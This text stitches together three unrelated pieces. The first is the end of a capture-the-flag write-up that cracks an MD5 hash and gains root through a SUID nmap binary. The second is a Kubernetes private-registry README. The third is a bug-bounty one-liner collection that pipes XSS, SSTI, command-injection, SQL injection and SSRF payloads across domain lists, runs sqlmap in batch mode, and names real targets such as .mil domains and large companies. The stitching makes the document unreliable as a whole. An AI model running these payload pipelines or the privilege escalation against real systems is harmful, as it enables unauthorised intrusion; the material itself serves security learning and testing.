Hashcat](./img/K2B_17_unhash_md5_hash_with_hashcat.png) * Note : recommend using [rockyou.txt](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) as the cracking wordlist, which can also found in path ```/usr/share/wordlists/rockyou.txt``` * We can login with user account **robot**, by using command ```su <account>``` and key in the password found ![Successful login into user account robot](./img/K2_18_log_in_user_robot_successfully.png) * You should be able to read the text file with the 2nd flag till this stage * Reference : * <https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/> * <https://blog.wpscan.org/wpscan/2019/09/17/wpscan-brute-force.html> * <https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-224373/Wordpress-Wordpress-4.3.1.html> * <https://www.hackingarticles.in/wordpress-reverse-shell/> * <https://www.exploit-db.com/exploits/36374> * <https://md5hashing.net/> ### #3. Key 3 * Hint : nmap * Solve : * The priority is to get the root access of this web server, which we call *Linux Privilege Escalation* * **SUID (Set User ID)** is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner * There are certain file that run with *root permission* and *set true of the SUID flag*, which can be the break-in point in this case * They can be found with command : ```Bash find / -perm -u=s -type f 2>/dev/null ``` ![Files with SUID flag set](./img/K2_19_linux_privesc_SUID_nmap.png) * Worth to notice that nmap is included and it has an interactive mode enabled in older version [(2.02 - 5.21)](https://gtfobins.github.io/gtfobins/nmap/) * By enabling the interactive mode, we get the root access without login password successfully ! ![Commands from SUID-enbabled ](./img/K2_20_linux_privesc_nmap_interactive_root_access.png) * Now we can access ```/root``` and the flag is found ![/root directory on this machine](./img/K2_21_linux_privesc_root_directory_3rd_flag.png) * Reference : * [Linux SUID executable](https://pentestlab.blog/2017/09/25/suid-executables/)
# Private Docker Registry in Kubernetes Kubernetes offers an optional private Docker registry addon, which you can turn on when you bring up a cluster or install later. This gives you a place to store truly private Docker images for your cluster. ## How it works The private registry runs as a `Pod` in your cluster. It does not currently support SSL or authentication, which triggers Docker's "insecure registry" logic. To work around this, we run a proxy on each node in the cluster, exposing a port onto the node (via a hostPort), which Docker accepts as "secure", since it is accessed by `localhost`. ## Turning it on Some cluster installs (e.g. GCE) support this as a cluster-birth flag. The `ENABLE_CLUSTER_REGISTRY` variable in `cluster/gce/config-default.sh` governs whether the registry is run or not. To set this flag, you can specify `KUBE_ENABLE_CLUSTER_REGISTRY=true` when running `kube-up.sh`. If your cluster does not include this flag, the following steps should work. Note that some of this is cloud-provider specific, so you may have to customize it a bit. ### Make some storage The primary job of the registry is to store data. To do that we have to decide where to store it. For cloud environments that have networked storage, we can use Kubernetes's `PersistentVolume` abstraction. The following template is expanded by `salt` in the GCE cluster turnup, but can easily be adapted to other situations: <!-- BEGIN MUNGE: EXAMPLE registry-pv.yaml.in --> ```yaml kind: PersistentVolume apiVersion: v1 metadata: name: kube-system-kube-registry-pv labels: kubernetes.io/cluster-service: "true" spec: {% if pillar.get('cluster_registry_disk_type', '') == 'gce' %} capacity: storage: {{ pillar['cluster_registry_disk_size'] }} accessModes: - ReadWriteOnce gcePersistentDisk: pdName: "{{ pillar['cluster_registry_disk_name'] }}" fsType: "ext4" {% endif %} ``` <!-- END MUNGE: EXAMPLE registry-pv.yaml.in --> If, for example, you wanted to use NFS you would just need to change the `gcePersistentDisk` block to `nfs`. See [here](https://kubernetes.io/docs/user-guide/volumes.md) for more details on volumes. Note that in any case, the storage (in the case the GCE PersistentDisk) must be created independently - this is not something Kubernetes manages for you (yet). ### I don't want or don't have persistent storage If you are running in a place that doesn't have networked storage, or if you just want to kick the tires on this without committing to it, you can easily adapt the `ReplicationController` specification below to use a simple `emptyDir` volume instead of a `persistentVolumeClaim`. ## Claim the storage Now that the Kubernetes cluster knows that some storage exists, you can put a claim on that storage. As with the `PersistentVolume` above, you can start with the `salt` template: <!-- BEGIN MUNGE: EXAMPLE registry-pvc.yaml.in --> ```yaml kind: PersistentVolumeClaim apiVersion: v1 metadata: name: kube-registry-pvc namespace: kube-system labels: kubernetes.io/cluster-service: "true" spec: accessModes: - ReadWriteOnce resources: requests: storage: {{ pillar['cluster_registry_disk_size'] }} ``` <!-- END MUNGE: EXAMPLE registry-pvc.yaml.in --> This tells Kubernetes that you want to use storage, and the `PersistentVolume` you created before will be bound to this claim (unless you have other `PersistentVolumes` in which case those might get bound instead). This claim gives you the right to use this storage until you release the claim. ## Run the registry Now we can run a Docker registry: <!-- BEGIN MUNGE: EXAMPLE registry-rc.yaml --> ```yaml apiVersion: v1 kind: ReplicationController metadata: name: kube-registry-v0 namespace: kube-system labels: k8s-app: kube-registry-upstream version: v0 kubernetes.io/cluster-service: "true" spec: replicas: 1 selector: k8s-app: kube-registry-upstream version: v0 template: metadata: labels: k8s-app: kube-registry-upstream version: v0 kubernetes.io/cluster-service: "true" spec: containers: - name: registry image: registry:2 resources: limits: cpu: 100m memory: 100Mi env: - name: REGISTRY_HTTP_ADDR value: :5000 - name: REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY value: /var/lib/registry volumeMounts: - name: image-store mountPath: /var/lib/registry ports: - containerPort: 5000 name: registry protocol: TCP volumes: - name: image-store persistentVolumeClaim: claimName: kube-registry-pvc ``` <!-- END MUNGE: EXAMPLE registry-rc.yaml --> ## Expose the registry in the cluster Now that we have a registry `Pod` running, we can expose it as a Service: <!-- BEGIN MUNGE: EXAMPLE registry-svc.yaml --> ```yaml apiVersion: v1 kind: Service metadata: name: kube-registry namespace: kube-system labels: k8s-app: kube-registry-upstream kubernetes.io/cluster-service: "true" kubernetes.io/name: "KubeRegistry" spec: selector: k8s-app: kube-registry-upstream ports: - name: registry port: 5000 protocol: TCP ``` <!-- END MUNGE: EXAMPLE registry-svc.yaml --> ## Expose the registry on each node Now that we have a running `Service`, we need to expose it onto each Kubernetes `Node` so that Docker will see it as `localhost`. We can load a `Pod` on every node by creating following daemonset. <!-- BEGIN MUNGE: EXAMPLE ../../saltbase/salt/kube-registry-proxy/kube-registry-proxy.yaml --> ```yaml apiVersion: extensions/v1beta1 kind: DaemonSet metadata: name: kube-registry-proxy namespace: kube-system labels: k8s-app: kube-registry-proxy kubernetes.io/cluster-service: "true" version: v0.4 spec: template: metadata: labels: k8s-app: kube-registry-proxy kubernetes.io/name: "kube-registry-proxy" kubernetes.io/cluster-service: "true" version: v0.4 spec: containers: - name: kube-registry-proxy image: gcr.io/google_containers/kube-registry-proxy:0.4 resources: limits: cpu: 100m memory: 50Mi env: - name: REGISTRY_HOST value: kube-registry.kube-system.svc.cluster.local - name: REGISTRY_PORT value: "5000" ports: - name: registry containerPort: 80 hostPort: 5000 ``` <!-- END MUNGE: EXAMPLE ../../saltbase/salt/kube-registry-proxy/kube-registry-proxy.yaml --> When modifying replication-controller, service and daemon-set defintions, take care to ensure _unique_ identifiers for the rc-svc couple and the daemon-set. Failing to do so will have register the localhost proxy daemon-sets to the upstream service. As a result they will then try to proxy themselves, which will, for obvious reasons, not work. This ensures that port 5000 on each node is directed to the registry `Service`. You should be able to verify that it is running by hitting port 5000 with a web browser and getting a 404 error: ```console $ curl localhost:5000 404 page not found ``` ## Using the registry To use an image hosted by this registry, simply say this in your `Pod`'s `spec.containers[].image` field: ```yaml image: localhost:5000/user/container ``` Before you can use the registry, you have to be able to get images into it, though. If you are building an image on your Kubernetes `Node`, you can spell out `localhost:5000` when you build and push. More likely, though, you are building locally and want to push to your cluster. You can use `kubectl` to set up a port-forward from your local node to a running Pod: ```console $ POD=$(kubectl get pods --namespace kube-system -l k8s-app=kube-registry \ -o template --template '{{range .items}}{{.metadata.name}} {{.status.phase}}{{"\n"}}{{end}}' \ | grep Running | head -1 | cut -f1 -d' ') $ kubectl port-forward --namespace kube-system $POD 5000:5000 & ``` Now you can build and push images on your local computer as `localhost:5000/yourname/container` and those images will be available inside your kubernetes cluster with the same name. # More Extensions - [Use GCS as storage backend](gcs/README.md) - [Enable TLS/SSL](tls/README.md) - [Enable Authentication](auth/README.md) ## Future improvements * Allow port-forwarding to a Service rather than a pod (#15180) [![Analytics](https://kubernetes-site.appspot.com/UA-36037335-10/GitHub/cluster/addons/registry/README.md?pixel)]()
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Airixss](https://github.com/ferreiraklet/airixss) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Freq](https://github.com/takshal/freq) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Goop](https://github.com/deletescape/goop) - [GetJS](https://github.com/003random/getJS) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Notify](https://github.com/projectdiscovery/notify) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [Unfurl](https://github.com/tomnomnom/unfurl) - [Urldedupe](https://github.com/ameenmaali/urldedupe) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [X8](https://github.com/Sh1Yo/x8) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Scan All github repo ORG - [Explained command] ```bash docker run --rm mswell/masstrufflehog -o paypal ``` ### Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### SSTI in qsreplase add "{{7*7}}" (0xJin) ```bash cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` ### urldedupe bhedak - [Explained command] ```bash waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Hakrawler Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" ``` ### FREQ XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not' ``` ### Bhedak - [Explained command] ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command] ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command] ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command] ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command] ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command] ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command] ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command] ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command] ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command] ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command] ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command] ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command] ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command] ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command] ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command] ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command] ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command] ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command] ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command] ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command] ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command] ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command] ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command] Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command] ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command] Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command] We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command] Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search] Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command] ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command] ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command] ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command] ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command] ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command] ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command] ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command] ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command] Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command] echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command] ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command] To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into 